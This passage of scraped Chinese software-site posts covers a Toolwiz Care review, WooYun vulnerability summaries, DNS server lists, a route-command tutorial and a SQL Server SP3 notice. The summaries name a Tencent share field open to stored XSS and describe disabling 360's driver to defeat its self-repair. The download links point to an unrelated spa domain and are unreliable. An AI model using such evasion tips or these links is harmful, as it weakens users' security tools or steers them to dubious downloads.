Care</a>才剛剛起步,因此測試前我也不會對它期望過高,畢竟沒有任何事物可以一飛登天。就國內的360安全衛士來,它也是積累了不少年月才有今天的成績的,雖然我一直對它的好感不怎么樣。</p><p>目前官方提供Toolwiz Care的下載鏈接只有Cnet網站的,這點希望官方日后能夠提供多些下載地址。</p><p>Toolwiz Care的安裝,筆者遇到了一個小問題,不知道是否是Windows 7 64位的緣故,Toolwiz Care會出現亂碼。后來經過“高人”的指點,在系統分區根目錄新建一個文件English.txt,重新運行軟件就恢復正常了。</p><p>言歸正傳,筆者簡單談談Toolwiz Care的界面、功能和操作。</p><p>首先是<a href="http://www.pirinnaturalssoapandspa.com/soft/36371.html" target="_blank">Toolwiz Care</a>的界面。有那么一點點弱,有點粗糙,不知道是否是初版的原因。建議官方重新設計UI,現在很多用戶都重視軟件的UI設計,不然你的功能再好,用戶還是有可能非常不理智地使用一個功能不多不大,但UI設計的很精美的軟件。</p><p><img alt="" src="https://pic.cr173.com/up/2011-12/2011120109111642815.jpg" /></p><p>其次是Toolwiz Care的功能。在功能上,Toolwiz Care還是很全面和強大的。如系統檢測、系統清理,系統優化、安全中心,程序管理和工具箱,應有盡有。系統優化工具的功能大部分都如同一撤。不過Toolwiz Care最大的特色在它的工具箱,提供各種非常有用的小工具。如文件粉碎,磁盤擦除、重復文件查找和文件恢復;文件加密與解密,安全密碼生成器,超級游戲加速;右鍵菜單管理,密碼管理工具……這些小工具有時候真的非常必要。最難能可貴的是這么多的功能,Toolwiz Care的體積才不過3.5MB,正所謂麻雀雖小五臟俱全??!</p><p><img alt="" src="https://pic.cr173.com/up/2011-12/2011120109111743870.jpg" /><br /><br /><br />新加坡安全衛士Toolwiz Care下載: <a href="http://www.pirinnaturalssoapandspa.com/soft/36371.html">http://www.pirinnaturalssoapandspa.com/soft/36371.html</a><br /><br />不過也有另筆者惋惜的地方,就是Toolwiz Care缺少木馬查殺功能。木馬查殺功能對于大部分電腦用戶來說,像Toolwiz Care這樣的工具不可少啊。期待日后的版本,會整合木馬查殺那樣的功能。</p><p>對于Toolwiz Care的操作,則沒什么可評論的地方,中規中規的功能分類,用戶很容易地找到自己需要的功能,有眾多優化工具案例也參考,相信在用戶體驗上,Toolwiz Care做到優秀也不是什么難事。</p><p>寫在最后,對于一款新興的系統優化工具,Toolwiz Care能做到這個程度是值得人敬佩的。免費,體積小,功能全面……如果日后Toolwiz Care在各個方面做得更加完美,相信未來Toolwiz Care也將是優秀系統優化工具陣列的一員。</p> [病毒漏洞]騰訊分享功能導致騰訊朋友網等多處存儲型XSS漏洞 http://www.pirinnaturalssoapandspa.com//html/13555_1.html WebSPRing 病毒漏洞 2011/11/19 9:39:22 <p><strong>漏洞概要 <br /></strong><br />缺陷編號: WooYun-2011-03335</p><p>漏洞標題: 騰訊朋友網存儲型XSS漏洞 </p><p>相關廠商: 騰訊</p><p>漏洞作者: WebSPRing </p><p>提交時間: 2011-11-17</p><p>漏洞類型: xss跨站腳本攻擊</p><p>危害等級: 高</p><p>自評Rank: 20</p><p>漏洞狀態: 廠商已經確認<br /><br /><br /></p><p><strong>漏洞詳情</strong></p><p>簡要描述:</p><p>騰訊分享功能導致騰訊朋友網等多處存儲型XSS漏洞。分享功能鏈接:http://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url=,該功能中的Summary字段在朋友網顯示前沒有進行編碼過濾等安全操作,導致存儲型XSS漏洞。</p><p>漏洞hash:b2f2835b68630cfc41ce5229787cf150<br /><br /></p><p><strong>漏洞回應</strong></p><p>廠商回應:</p><p>危害等級:高</p><p>漏洞Rank:20 </p><p>確認時間:2011-11-17</p><p>廠商回復:</p><p>非常感謝</p><p>最新狀態:</p><p>暫無</p> [病毒漏洞]通過設備管理器“停用”360驅動可造成360無法自我修復 http://www.pirinnaturalssoapandspa.com//html/13554_1.html 不詳 病毒漏洞 2011/11/19 9:30:04 <p><strong>漏洞概要<br /></strong><br />缺陷編號: WooYun-2011-03347</p><p>漏洞標題: 通過設備管理器“停用”360驅動可造成360無法自我修復 </p><p>相關廠商: 奇虎360</p><p>漏洞作者: zhq445078388 </p><p>提交時間: 2011-11-18</p><p>漏洞類型: 應用配置錯誤</p><p>危害等級: 低</p><p>自評Rank: 3</p><p>漏洞狀態: 等待廠商處理<br /><br /><br /></p><p><strong>漏洞詳情</strong></p><p>簡要描述:</p><p>用設備管理器的驅動停用功能 可以繞過360的自我修復<br />造成一定程度的拒絕服務</p><p>漏洞hash:275517a19d0f47ba2b4241a922d1594b<br /><br /></p><p><strong>漏洞回應</strong></p><p>廠商回應:</p><p>暫無</p> [網絡安全]全國電信及網通DNS列表(附國外開放DNS) http://www.pirinnaturalssoapandspa.com//html/13495_1.html 佚名 網絡安全 2011/11/9 9:50:06 <p> 西西今天突然上不起網了真見鬼,QQ可以上就是不能打開網頁,</p><p>用 cmd PING <a href="http://www.baidu.com">www.baidu.com</a> 也無法P通 那因該是DNS出問題了,哥用的可是 谷歌的DNS呀難道也會出問題呀 果不然 換一個當地的DNS就可以打開網頁了(遠大的組國什么都有可能)</p><p>下面是西西小編整理的一系列DNS列表</p><p>先給大家兩個開放式老外提供的的DNS吧</p><p>谷哥:&nbsp; <strong><span style="font-size:32px;"><span style="color:#ff0000;">8.8.8.8</span>&nbsp; <span style="color:#ff0000;">8.8.4.4</span></span></strong></p><p>OpenDNS: <span style="font-size:24px;color:#3366ff;"><strong>208.67.222.222 208.67.220.220</strong></span></p><h3><span style="color:#3333ff;">下面就是各省的DNS列表</span></h3><p>在使用之前最好在 cmd 下面Ping 一下這個dns看是否能P通.</p><p>北京DNS地址:<br />202.96.199.133<br />202.96.0.133<br />202.106.0.20<br />202.106.148.1<br />202.97.16.195<br />上海DNS地址:202.96.199.132<br />202.96.199.133<br />202.96.209.5<br />202.96.209.6<br />202.96.209.133<br />天津DNS地址:202.99.96.68<br />10.10.64.68<br />重慶DNS地址:61.128.128.68<br />10.150.0.1<br />61.128.192.4<br />廣東DNS地址:202.96.128.143<br />202.96.128.68<br />202.96.128.110<br />深圳DNS地址:202.96.134.133<br />202.96.154.8<br />202.96.154.15<br />四川DNS地址:202.98.96.68<br />61.139.2.69<br />成都DNS地址:202.98.96.68<br />202.98.96.69<br />河南DNS地址:202.102.227.68<br />202.102.245.12<br />202.102.224.68<br />廣西DNS地址:202.96.128.68<br />202.103.224.68<br />202.103.225.68<br />福建DNS地址:218.85.157.99<br />202.101.115.55<br />廈門DNS地址:202.101.103.55<br />202.101.103.54<br />湖南DNS地址:202.103.0.68<br />202.103.96.68<br />202.103.96.112<br />江蘇DNS地址:202.102.15.162<br />202.102.29.3<br />202.102.3.141<br />202.102.24.35<br />陜西DNS地址:202.100.13.11<br />202.100.4.16<br />西安DNS地址:202.100.4.15<br />202.100.0.68<br />湖北DNS地址:202.103.0.68<br />202.103.0.117<br />202.103.24.68<br />山東DNS地址:202.102.154.3<br />202.102.152.3<br />202.102.128.68<br />202.102.134.68<br />浙江DNS地址:202.96.102.3<br />202.96.96.68<br />202.96.104.18<br />遼寧DNS地址:202.98.0.68<br />202.96.75.68<br />202.96.75.64<br />202.96.69.38<br />202.96.86.18<br />202.96.86.24<br />安徽DNS地址:202.102.192.68<br />202.102.199.68<br />10.89.64.5<br />河北DNS地址:202.99.160.68<br />10.17.128.90<br />保定DNS地址:202.99.160.68<br />202.99.166.4<br />吉林DNS地址:202.98.5.68<br />202.98.14.18<br />202.98.14.19<br />江西DNS地址:202.101.224.68<br />10.117.32.40<br />202.109.129.2<br />202.101.240.36<br />山西DNS地址:202.99.192.68<br />202.99.198.6<br />新疆DNS地址:61.128.99.133<br />61.128.99.134<br />貴州DNS地址:202.98.192.68<br />10.157.2.15<br />云南DNS地址:202.98.96.68<br />202.98.160.68<br />黑龍江DNS地址:202.97.229.133<br />202.97.224.68<br />內蒙古DNS地址:202.99.224.68<br />10.29.0.2<br />青海DNS地址:202.100.128.68<br />10.184.0.1<br />海南DNS地址:202.100.192.68<br />202.100.199.8<br />寧夏DNS地址:202.100.0.68<br />202.100.96.68<br />甘肅DNS地址:202.100.72.13<br />10.179.64.1<br />香港DNS地址:205.252.144.228<br />208.151.69.65<br />澳門DNS地址:202.175.3.8<br />202.175.3.3<br />網通<br /><br />省份/城市 DNS 名稱 DNS IP ADDRESS <br />香港 ns1.netvigator.com 205.252.144.228 <br /><br />澳門 vassun2.macau.ctm.net 202.175.3.8 <br /><br />深圳 ns.shenzhen.gd.cn 202.96.134.133 202.96.154.8 202.96.154.15 <br /><br />北京 ns.bta.net.cn 202.96.0.133 <br />ns.spt.net.cn 202.96.199.133 <br />ns.cn.net 202.97.16.195 <br />202.106.0.20 <br />202.106.148.1 <br />202.106.196.115 <br /><br />廣東 ns.guangzhou.gd.cn 202.96.128.143 <br />dns.guangzhou.gd.cn 202.96.128.68 <br /><br />上海 ns.sta.net.cn 202.96.199.132 <br />202.96.199.133 <br />202.96.209.5 <br />202.96.209.133 <br /><br />浙江 dns.zj.cninfo.net 202.96.102.3 <br />202.96.96.68 <br />202.96.104.18 <br /><br />陜西 ns.snnic.com 202.100.13.11 <br /><br />西安: 202.100.4.15 <br />202.100.0.68 <br /><br />天津 ns.tpt.net.cn 202.99.96.68 <br /><br />遼寧 ns.dcb.ln.cn 202.96.75.68 <br />202.96.75.64 <br />202.96.64.68 <br />202.96.69.38 <br />202.96.86.18 <br />202.96.86.24 <br /><br />江蘇 pub.jsinfo.net 202.102.29.3 <br />202.102.13.141<br />202.102.24.35<br /><br />安徽:<br />202.102.192.68<br />202.102.199.68<br /><br /><br />四川 ns.sc.cninfo.net 61.139.2.69 <br /><br />重慶 61.128.128.68 <br />61.128.192.4 <br /><br />成都: 202.98.96.68 <br />202.98.96.69 <br /><br />河北 ns.hesjptt.net.cn 202.99.160.68 <br /><br />保定: 202.99.160.68 <br />202.99.166.4 <br /><br />山西 ns.sxyzptt.net.cn 202.99.198.6 <br /><br />吉林 ns.jlccptt.net.cn 202.98.5.68 <br /><br />山東 202.102.152.3 <br />202.102.128.68 <br /><br />福建 dns.fz.fj.cn 202.101.98.55 <br /><br />湖南 202.103.100.206 <br /><br />廣西 10.138.128.40 <br />202.103.224.68 <br />202.103.225.68 <br /><br />江西 202.109.129.2 <br />202.101.224.68---j江西電信DNS <br />202.101.226.68---江西電信DNS <br />202.101.240.36 ---江西電信DNS ?<br /><br />云南 ns.ynkmptt.net.cn 202.98.160.68 <br /><br />河南: 202.102.227.68 <br />202.102.224.68 <br />202.102.245.12 <br /><br />新疆: 61.128.97.73 <br /><br />烏魯木齊 61.128.97.73 <br />61.128.97.74 <br /><br />武漢: 202.103.24.68 <br />202.103.0.117 <br /><br />廈門兩個 <br />202.101.103.55 <br />202.101.103.54 <br /><br />山東的: 202.102.134.68 <br /><br />長沙 <br />58.20.57.4 210.52.149.2<br /><br /><br />一些教育網內的----不一定好用 <br />202.203.128.33 cernet云南中心主dns <br />202.203.128.34 <br /><br />210.14.232.241 and 203.93.19.133 羅湖 <br />202.112.10.37 長安 <br />202.115.64.33 and 202.115.64.34 西南交大 <br />202.201.48.1 and 202.201.48.2 nwnu <br />210.33.116.112 浙江電大 <br />202.116.160.33 華南農業 <br />202.114.240.6 wust <br />202.194.48.130 ytnc <br />202.114.0.242 and 202.112.20.131 華中科大 <br />202.202.128.33 and 202.202.128.34 重慶醫科大?西安交大? <br />202.112.0.33 and 202.112.0.34 cernet 華北網 <br />210.38.192.33 韶關<br /><br />全國各地VPI/VCI列表<br />地名 VPI VCI DNS 其它<br />北京 0 35 202.106.196.115 <br />天津 0 35 202.99.96.68 <br />廣西 0 35 202.103.224.68, 202.103.225.68 <br />云南 0 35 61.166.150.101 <br />普洱 0 35 61.166.150.101, 61.166.15.170<br />蘭州 0 32 <br />西安 8 35 <br />長春 8 35 <br />吉林市 0 39 202.98.0.68<br />0 38 202.98.5.68<br />哈爾濱 8 35<br />武漢 0 32 202.103.24.68<br />烏魯木齊0 32 61.128.99.133, 61.128.99.134<br />順德 8 81 202.96.128.68<br />廣州 8 32 202.96.128.68, 202.96.128.110<br />8 35<br />中山 8 35<br />河源 8 81 202.96.128.143, 202.96.128.43<br />惠東 0 100 <br />東莞 8 35<br />從化 8 35 202.96.128.68<br />湛江 0 80<br />8 81<br />0 100 202.96.128.68, 202.96.128.143 <br />陽江 8 35 202.96.128.68, 202.96.135.133<br />南海 0 100 202.96.128.68, 202.96.134.133<br />江門 0 100 202.96.128.68 <br />汕尾 0 35<br />珠海 8 35<br />斗門 0 100 <br />汕頭地區8 81 202.96.128.143, 202.96.128.68<br />汕頭 0 35 <br />東莞 0 100<br />肈慶 8 81 61.140.7.67, 202.96.134.133<br />202.96.128.68,202.96.128.143 <br />佛山 8 35 202.96.128.68<br />惠州 0 100 <br />福清 0 200<br />揭陽 8 81 <br />秦皇島 0 35 202.99.160.68, 202.99.166.4<br />浙江衢州8<br /><br />81 202.101.172.37, 202.96.104.18 <br />杭州 8 35 <br />0 32 202.101.172.35, 202.96.104.18<br />遼寧 0 35<br />撫順鐵通8 32 210.52.149.2, 211.98.2.4<br />202.96.64.68<br />10.0.1.254(固定IP)<br />河南安陽8 81 202.102.224.68, 202.102.227.68<br />濮陽 0 35 202.102.224.68, 202.102.227.68<br />駐馬店 0 35 202.102.224.68<br />河南鐵通0 35 211.98.192.3,202.102.224.68<br />山東棗莊8 81 <br />重慶 0 35<br />湖南 0 35 211.98.2.4<br />婁底 8 81 202.103.88.3, 202.103.100.100<br />貴州六盤水0 35 202.98.198.168<br />福建 0 200 202.101.98.55, 202.101.98.54<br />南平 0 35 202.101.115.55<br />廈門 8 35<br />福州 0 200 202.101.98.55<br />龍巖 0 35 202.101.113.55<br />三明 0 100 202.101.114.55 <br />安徽合肥0 35<br />0 32 <br />0 33 202.102.192.68 <br />中原油田8 81<br />河南焦作0 35 10.255.0.68, 202.102.227.68<br />上海 8 81 202.96.209.5, 202.96.209.133<br />福建福州0 200  202.101.98.55 <br /><br />廣東珠海8 35 市區(含吉大、拱北、香洲、新香洲)、唐家、金鼎<br />0 100 南屏、西區</p><p>至于如何修改DNS大家看下面的圖片吧.</p><p>西西用的是 Xp (還沒用過win7) 哈.就以XP為例說明一下</p><p><img src="https://pic.cr173.com/up/2011-11/20111111990959362819.gif" alt="" /></p><p>先點桌面上的 網上鄰居 右擊點屬性</p><p><img src="https://pic.cr173.com/up/2011-11/20111111991000098774.gif" alt="" /></p><p>然后在你的網卡上面右擊點屬性</p><p><img src="https://pic.cr173.com/up/2011-11/20111111991000246967.gif" alt="" /></p><p>然后雙擊一下 internet協議(tcp/ip) 就可以修改了上面紅色部份就是了</p> [網絡安全]多個IP選擇線路的解決辦法 route http://www.pirinnaturalssoapandspa.com//html/13492_1.html 佚名 網絡安全 2011/11/8 23:29:35 <p>一臺電腦兩條線路一個電信IP一個聯通的IP,解決訪問電信的時候自動走電信線路,訪問聯通的時候自動走聯通的線路,我們可以用到下面這個命令</p><h2><span style="color:#ff0000;">ROUTE </span></h2><p>DOS命令我們都可以在 Cmd 下用 route /? 來查看他的幫助信息</p><p>先看一下他的幫助</p><p>Manipulates network routing tables.<br /><br /><span style="color:#ff0000;">ROUTE [-f] [-p] [command [destination]<br /></span>[MASK netmask] [gateway] [METRIC metric] [IF interface]<br /><br />-f Clears the routing tables of all gateway entries. If this is<br />used in conjunction with one of the commands, the tables are<br />cleared prior to running the command.<br />-p When used with the ADD command, makes a route persistent across<br />boots of the system. By default, routes are not preserved<br />when the system is restarted. Ignored for all other commands,<br />which always affect the appropriate persistent routes. This<br />option is not supported in Windows 95.<br />command One of these:<br />PRINT Prints a route<br />ADD Adds a route<br />DELETE Deletes a route<br />CHANGE Modifies an existing route<br />destination Specifies the host.<br />MASK Specifies that the next parameter is the 'netmask' value.<br />netmask Specifies a subnet mask value for this route entry.<br />If not specified, it defaults to 255.255.255.255.<br />gateway Specifies gateway.<br />interface the interface number for the specified route.<br />METRIC specifies the metric, ie. cost for the destination.<br /><br />All symbolic names used for destination are looked up in the network database<br />file NETWORKS. The symbolic names for gateway are looked up in the host name<br />database file HOSTS.<br /><br />If the command is PRINT or DELETE. Destination or gateway can be a wildcard,<br />(wildcard is specified as a star '*'), or the gateway argument may be omitted.<br /><br />If Dest contains a * or ?, it is treated as a shell pattern, and only<br />matching destination routes are printed. The '*' matches any string,<br />and '?' matches any one char. Examples: 157.*.1, 157.*, 127.*, *224*.<br />Diagnostic Notes:<br />Invalid MASK generates an error, that is when (DEST &amp; MASK) != DEST.<br />Example&gt; route ADD 157.0.0.0 MASK 155.0.0.0 157.55.80.1 IF 1<br />The route addition failed: The specified mask parameter is invalid<br />(Destination &amp; Mask) != Destination.<br /><br />Examples:<br /><br />&gt; route PRINT<br />&gt; route ADD 157.0.0.0 MASK 255.0.0.0 157.55.80.1 METRIC 3 IF 2<br />destination^ ^mask ^gateway metric^ ^<br />Interface^<br />If IF is not given, it tries to find the best interface for a given<br />gateway.<br />&gt; route PRINT<br />&gt; route PRINT 157* .... Only prints those matching 157*<br />&gt; route CHANGE 157.0.0.0 MASK 255.0.0.0 157.55.80.5 METRIC 2 IF 2<br /><br />CHANGE is used to modify gateway and/or metric only.<br />&gt; route PRINT<br />&gt; route DELETE 157.0.0.0<br />&gt; route PRINT</p><p>route - 顯示 / 操作IP選路表<br /><br />總覽 SYNOPSIS<br />route [-CFvnee]<br /><br />route [-v] [-A family] add [-net|-host] target [netmask Nm] [gw Gw] [metric N] [mss M] [window W] [irtt I][reject] [mod] [dyn] [reinstate] [[dev] If]<br /><br /><br />route [-v] [-A family] del [-net|-host] target [gw Gw][netmask Nm] [metric N] [[dev] If]<br /><br /><br />route [-V] [--version] [-h] [--help]<br /><br />描述 DESCRIPTION<br />route程序對內核的IP選路表進行操作。它主要用于通過已用ifconfig(8)程序配置好的接口來指定的主機或網絡設置靜態路由。<br /><br />選項 OPTIONS<br />-v <br />選用細節操作模式 <br />-A family <br />用指定的地址族(如`inet',`inet6')。 <br />-n <br />以數字形式代替解釋主機名形式來顯示地址。此項對試圖檢測對域名服務器進行路由發生故障的原因非常有用。 <br />-e <br />用netstat(8)的格式來顯示選路表。-ee將產生包括選路表所有參數在內的大量信息。 <br />-net <br />路由目標為網絡。 <br />-host <br />路由目標為主機。 <br />-F <br />顯示內核的FIB選路表。其格式可以用-e 和 -ee選項改變。 <br />-C <br />顯示內核的路由緩存。 <br />del <br />刪除一條路由。 <br />add <br />添加一條路由。 <br />target <br />指定目標網絡或主機??梢杂命c分十進制形式的IP地址或主機/網絡名。 <br />netmask Nm <br />為添加的路由指定網絡掩碼。 <br />gw Gw <br />為發往目標網絡/主機的任何分組指定網關。注意:指定的網關首先必須是可達的。也就是說必須為該網關預先指定一條靜態路由。如果你為本地接口之一指定這個網關地址的話,那么此網關地址將用于決定此接口上的分組將如何進行路由。這是BSD風格所兼容的。 <br />metric M <br />把選路表中的路由值字段(由選路進程使用)設為M。 <br />mss M <br />把基于此路由之上的連接的TCP最大報文段長度設為M字節。這通常只用于優化選路設置。默認值為536。 <br />window W <br />把基于此路由之上的連接的TCP窗口長度設為W字節。這通常只用于AX.25網絡和不能處理背對背形式的幀的設備。 <br />irtt I <br />把基于此路由之上的TCP連接的初始往返時間設為I毫秒(1-12000)。這通常也只用于AX.25網絡。如果省略此選項,則使用RFC1122的缺省值300ms。 <br />reject <br />設置一條阻塞路由以使一條路由查找失敗。這用于在使用缺省路由前先屏蔽掉一些網絡。但這并不起到防火墻的作用。 <br />mod, dyn, reinstate <br />設置一條動態的或更改過的路由。這些標志通常只由選路進程來設置。這只用于診斷目的, <br />dev If <br />強制使路由與指定的設備關聯,因為否則內核會自己來試圖檢測相應的設備(通常檢查已存在的路由和加入路由的設備的規格)。在多數正常的網絡上無需使用。 <br />如果dev If是命令行上最后一個指定的選項,那么可以省略關鍵字dev,因為它是缺省值。否則路由修改對象(metric - netmask- gw - dev)無關緊要。<br /><br />范例 EXAMPLES<br />route add -net 127.0.0.0 <br />加入正常的環回接口項,它使用掩碼255.0.0.0(由目標地址決定了它是A類網絡)并與設備&quot;lo&quot;相關聯(假定該設備先前已由ifconfig(8)正確設置)。 <br />route add -net 192.56.76.0 netmask 255.255.255.0 dev eth0 <br />向&quot;eth0&quot;添加一條指向網絡192.56.76.x的路由。其中的C類子網掩碼并不必須,因為192.*是個C類的IP地址。在此關鍵字&quot;dev&quot;可省略。 <br />route add default gw mango-gw <br />加入一條缺省路由(如果無法匹配其它路由則用它)。使用此路由的所有分組將通過網關&quot;mango-gw&quot;進行傳輸。實際使用此路由的設備取決于如何到達&quot;mango-gw&quot; - 先前必須設好到&quot;mango-gw&quot;的靜態路由。 <br />route add ipx4 sl0 <br />向SLIP接口添加一條指向&quot;ipx4&quot;的路由(假定&quot;ipx4&quot;是使用SLIP的主機)。 <br />route add -net 192.57.66.0 netmask 255.255.255.0 gw ipx4 <br />此命令為先前SLIP接口的網關ipx4添加到網絡&quot;192.57.66.x&quot;的路由。 <br />route add 224.0.0.0 netmask 240.0.0.0 dev eth0 <br />此命令為&quot;eth0&quot;設定所有D類地址(用于組播)的路由。這是用于組播內核的正確配置行。 <br />route add 10.0.0.0 netmask 255.0.0.0 reject <br />此命令為私有網絡&quot;10.x.x.x.&quot;設置一條阻塞路由。 <br />輸出信息 OUTPUT<br />內核選路表的輸出信息由以下欄目組成:<br /><br />Destination <br />目標網絡或目標主機。 <br />Gateway <br />網關地址或'*'(如未設)。 <br />Genmask <br />目標網絡的子網掩碼;'255.255.255.255'為主機,'0.0.0.0'為缺省路由。 <br />Flags <br />可能出現的標志有: <br />U (route is up) 路由正常 <br />H (target is a host) 主機路由 <br />G (use gateway) 使用網關的間接路由 <br />R (reinstate route for dynamic routing) 為動態選路恢復路由 <br />D (dynamically installed by daemon or redirect) 該路由由選路進程或重定向動態創建 <br />M (modified from routing daemon or rederict) 該路由已由選路進程或重定向修改 <br />! (reject route) 阻塞路由 <br />Metric <br />通向目標的距離(通常以跳來計算)。新內核不使用此概念,而選路進程可能會用。 <br />Ref <br />使用此路由的活動進程個數(Linux內核并不使用)。 <br />Use <br />查找此路由的次數。根據-F 和 -C的使用,此數值是路由緩存的損失數或采樣數。 <br />Iface <br />使用此路由發送分組的接口。 <br />MSS <br />基于此路由的TCP連接的缺省最大報文段長度。 <br />Window <br />基于此路由的TCP連接的缺省窗口長度。 <br />irtt <br />初始往返時間。內核用它來猜測最佳TCP協議參數而無須等待(可能很慢的)應答。 <br />HH (cached only) <br />為緩存過的路由而訪問硬件報頭緩存的ARP記錄和緩存路由的數量。如果緩存過路由的接口(如lo)無須硬件地址則值為-1。 <br />Arp (cached only) <br />無論緩存路由所用的硬件地址情況如何都進行更新。 <br />文件 FILES<br />/proc/net/ipv6_route <br />/proc/net/route <br />/proc/net/rt_cache <br /><br /><br /></p><p>&nbsp;兩個都能共享了,但是怎么自動選擇線路呢?目前有的網吧可以自動選擇線路,有的還得手動切換,呵呵,我的目的就是自動選擇。我想到了路由表,目標ip是學校的通過有線網卡,除此之外的所有ip都通過無限網卡。對,就是route命令,上網查了查有關route命令.具體設置是這樣的:tplink 410靜態ip,添加學校分給的ip,克隆mac,打開dhcp,dmz(驗證不打開也行。),lan端口設置 ip地址為 192.168.2.1,因為無線網絡要用到ip192.168.1.1,所以這個改成2.1當然改成別的也可以。無線路由當然要添加adsl的賬號密碼,dhcp打開,lan端口設置 ip默認,密匙之類的統統沒用,只是限制了mac地址,禁止宿舍幾臺電腦之外的mac訪問路由。<br /><br />設置好了以后就是路由表了,也就是route命令。Route命令在windows下和在linux下適用類似,但是有些細微的差別。下面介紹介紹我自己的route的理解,也是一知半解。高手可以給大家講詳細點兒。先把我的批處理貼出來:<br />route add 202.206.0.0 mask 255.255.0.0 192.168.2.1<br />route add 10.186.0.0 mask 255.255.0.0 192.168.2.1<br />route add 10.185.0.0 mask 255.255.0.0 192.168.2.1<br />route add 0.0.0.0 mask 0.0.0.0 192.168.1.1<br />參數含義:^destination ^mask ^gateway metric^ ^interface <br /><br />destination【網段地址】 <br />mask【子網掩碼】 <br />gateway【網關地址】 <br />metric 【路由跳數】 <br />if【端口號】 <br />其中: <br />可以省略【路由跳數】參數; <br />當通往該網關地址的路徑唯一時,【端口號】參數可以省略。(因為在多端口的路由交換設備上,可能存在通往同一個IP地址的多條備份路徑。) <br />mask 是關鍵字,不能省略。<br />route add 202.206.0.0 mask 255.255.0.0 192.168.2.1<br />意思是:所有發往202.206.0.0地址段的ip數據包,全部由192.168.2.1網關發送。<br />這樣大家就能看出來我們學校一些服務器的ip段大概就是202.206.0.0, 10.186.0.0 和10.185.0.0,其實還有其他的,只是我暫時用不到,所以沒添加。<br /><br />route add 0.0.0.0 mask 0.0.0.0 192.168.1.1<br />意思是:其他所有的地址段的ip數據包都由192.168.1.1發送。<br /><br />這樣每臺機子開機運行這個批處理,就能自動選擇雙線上網了。網吧的我估計也類似,他們完全可以用個雙wan路由,在路由器里或者服務器里邊添加靜態路由表,其他的機子就不用添加路由表了,就可以自動雙線上網了,不過電信網通的路由表貌似還很大,不知道誰能共享一下哦。呵呵<br /><br />還有route change 命令,就是把add改為change,就是更改靜態路由表。<br /><br />這樣,我們的目的就實現了,校內校外都能訪問,其中一臺電腦還可以通過學校的撥號程序訪問校外的資源,如果他已經運行了批處理,已經添加了靜態路由表,還可以通過route change命令更改。下面是我寫的一個批處理貼出:<br />@ECHO OFF<br />CLS<br />color 0a<br />ECHO =-=-=-=-=請選擇要啟動的服務項目=-=-=-=-=<br />ECHO. <br />ECHO 1 雙網雙線,如果不使用elink,開機選擇!<br />ECHO.<br />ECHO 2 恢復elink撥號(之前選擇了1,現在重新選擇2,如果之前沒有選擇線路,此時不需<br />ECHO 選擇,直接撥號即可)<br />ECHO. <br />ECHO 3 恢復雙網雙線(之前選擇了2現在重新選回雙網雙線)<br />ECHO. <br />ECHO.<br />SET /P ST= 請輸入 1 2 3 或 其他任意鍵取消:<br />if /I \&quot;%ST%\&quot;==\&quot;1\&quot; goto SERVICE1<br />if /I \&quot;%ST%\&quot;==\&quot;2\&quot; goto SERVICE2<br />if /I \&quot;%ST%\&quot;==\&quot;3\&quot; goto SERVICE3<br /><br />goto END<br /><br />:SERVICE1<br />route add 202.206.0.0 mask 255.255.0.0 192.168.2.1<br />route add 10.186.0.0 mask 255.255.0.0 192.168.2.1<br />route add 10.185.0.0 mask 255.255.0.0 192.168.2.1<br />route add 0.0.0.0 mask 0.0.0.0 192.168.1.1<br /><br />:SERVICE2<br />route change 0.0.0.0 mask 0.0.0.0 192.168.2.1<br /><br /><br />:SERVICE3<br />route change 0.0.0.0 mask 0.0.0.0 192.168.1.1<br /><br /><br />:END<br /><br />這樣就可以自由選擇怎么上網了,其實我感覺用vb寫個小程序更好一些呵呵。<br /><br />先告一段落吧,還有一點就是linux下的route add命令。<br />Route 202.206.0.0 netmask 255.255.0.0 gw 192.168.2.1<br /><br />好了,寫到這里了,思路很亂不知道改怎么整理,這是我第一次寫類似這樣的文章。大家別取笑了。希望對宿舍內共享上網的人能有幫助。</p> [數據庫安全]SQL Server 2008 SP3簡體中文版下載 http://www.pirinnaturalssoapandspa.com//html/13319_1.html 佚名 數據庫安全 2011/10/17 22:11:08 Microsoft SQL Server 2008 Service Pack 3 (SP3) 現在可供下載。我們不僅控制著產品更改,而且還投入了很大的力量來簡化 Service Pack 的部署和管理。對于客戶來說,Microsoft SQL Server 2008 Service Pack 3 中有這樣幾項重要改進:<br /><br /> 從 SQL Server 的舊版本升級到 SQL Server 2008 SP3 的過程體驗得到了改進。另外,我們增強了安裝體驗的性能和可靠性。<br /> 在 SQL Server Integration Services 日志中,現在能看到在數據流中發送的總行數。<br /> 在啟用了“縮減數據庫”選項的情況下創建維護計劃時的警告信息得到了改進。<br /> 在啟用了透明數據加密的情況下解決數據庫問題,而且即使刪除了證書也能使用數據庫。<br /> 在 DTA(數據庫調節顧問)引用經過索引的“空間數據類型”列時,查詢結果經過了優化。<br /> 用戶在并行執行計劃中使用“序列函數”(如 Row_Numbers())可獲得優異的體驗。<br /><br /><br />Microsoft SQL Server 2008 Service Pack 2 不是安裝 SQL Server 2008 Service Pack 3 的先決條件??梢允褂眠@些包升級以下 SQL Server 2008 版本:<br /><br /> Enterprise<br /> Standard<br /> Evaluation<br /> 開發人員<br /> Workgroup<br /><br /><br />SQL Server 2008 SP3 包含 SQL Server 2008 SP2 累積更新包 1 至 4 的累積更新,以及對通過客戶反饋平臺所收集問題的修復。它包括可支持性增強以及通過 Windows 錯誤報告收集的問題。<br /><br /><br />注意:要獲取用于 Express Edition 或具有高級服務的 Express Edition 的 SQL Server 2008 SP3,請轉到此處。<br />有關 SQL Server 2008 SP3 中包括的新功能和改進的詳細列表,請參閱發行說明。<br /><br /><h2 class="title"><strong>微軟日前公開發布了SQL Server 2008 SP3,用戶可以從微軟下載中心獲取SP服務包和功能包升級。SP3主要包括自SQL Server 2008 SP2以來的累積更新,修復了用戶反饋的一些問題。SQL Server 2008 SP3主要更新如下:</strong></h2><p><strong>  — 完善了從之前版本升級至SQL Server 2008 SP3的用戶體驗,對產品啟動進行了性能和穩定性的增強;</strong></p><p><strong>  — 在SQL Server Integration服務日志中將顯示所有Data Flows中發送的總行數;</strong></p><p><strong>  — 當Shrink Database選項開啟時,增強了創建維護計劃的警告信息;</strong></p><p><strong>  — 解決了透明數據加密啟用時的數據庫問題;</strong></p><p><strong>  — 優化了索引關于DAT(數據庫調節向導)的Spatial Data Type列的查詢結果;</strong></p><p><strong>  — Sequence Functions(例如Row_Numbers())用戶體驗優化。</strong></p><p><strong>  下面列出了SQL Server SP3包的大?。?lt;/strong></p><p><strong>  SQL Server Express包:</strong></p><p><strong>  